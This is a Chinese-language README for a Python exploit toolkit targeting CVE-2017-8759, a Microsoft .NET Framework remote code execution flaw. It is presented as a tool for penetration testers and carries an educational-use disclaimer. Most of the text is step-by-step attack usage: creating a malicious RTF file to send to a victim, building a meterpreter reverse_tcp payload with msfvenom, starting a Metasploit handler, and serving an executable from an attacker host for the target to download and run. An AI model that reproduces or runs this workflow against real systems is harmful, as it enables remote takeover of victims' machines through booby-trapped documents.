漏洞利用工具包 CVE-2017-8759 - v1.0 是一个方便的 Python 脚本,为渗透测试人员和安全研究人员提供了一种快速有效的方法来测试 Microsoft .NET Framework 远程代码执行。它可以生成恶意 RTF 文件,并将 metasploit / meterpreter / 其他载荷传递给受害者,无需任何复杂配置。
本程序仅供教育目的。未经许可不得使用。通常的免责声明适用,尤其是本人 (bhdresh) 不对直接或间接使用这些程序提供的信息或功能所造成的任何损害负责。作者或任何互联网提供商对这些程序或其任何衍生品的内容或滥用不承担任何责任。使用本程序即表示您接受:因使用这些程序造成的任何损害(数据丢失、系统崩溃、系统入侵等)均非 bhdresh 的责任。
最后,这是一个个人开发项目,请尊重其理念,不要将其用于不良用途!
CC BY 4.0 许可证 - https://creativecommons.org/licenses/by/4.0/
引入以下脚本功能
- 生成恶意 RTF 文件
- 针对生成的 RTF 文件的利用模式
版本:Python 2.7.13
1) 生成恶意 RTF 文件
# python cve-2017-8759_toolkit.py -M gen -w Invoice.rtf -u http://192.168.56.1/logo.txt
2) (可选,如果使用 MSF 载荷):生成 metasploit 载荷并启动处理程序
# msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.56.1 LPORT=4444 -f exe > /tmp/shell.exe
# msfconsole -x "use multi/handler; set PAYLOAD windows/meterpreter/reverse_tcp; set LHOST 192.168.56.1; run"
3) 启动工具包在利用模式以传送本地载荷
# python cve-2017-8759_toolkit.py -M exp -e http://192.168.56.1/shell.exe -l /tmp/shell.exe
# python cve-2017-8759_toolkit.py -h
这是一个方便的利用 CVE-2017-8759(Microsoft .NET Framework 远程代码执行)的工具包
模式:
-M gen 仅生成恶意文件
生成恶意 RTF 文件:
-w <Filename.rtf> 恶意 RTF 文件的名称(将此文件分享给受害者)。
-u <http://attacker.com/test.txt> 远程 txt 文件的路径。通常,这应该是一个域名或 IP,即此工具包运行的地方。
例如,http://attackerip.com/test.txt(该 URL 将包含在恶意 RTF 文件中,受害者打开该文件后将请求此 URL)。
-M exp 启动利用模式
利用:
-p <TCP port:Default 80> 本地端口号。
-e <http://attacker.com/shell.exe> 需要在目标上执行的可执行文件 / meterpreter shell / 载荷的路径。
-l </tmp/shell.exe> 指定可执行文件 / meterpreter shell / 载荷的本地路径。
@bhdresh
@Voulnet, @vysec, @bhdresh
显然,我不是全职开发者,所以可能会有些小问题。
请通过 https://github.com/bhdresh/CVE-2017-8759/issues/new 报告错误和问题。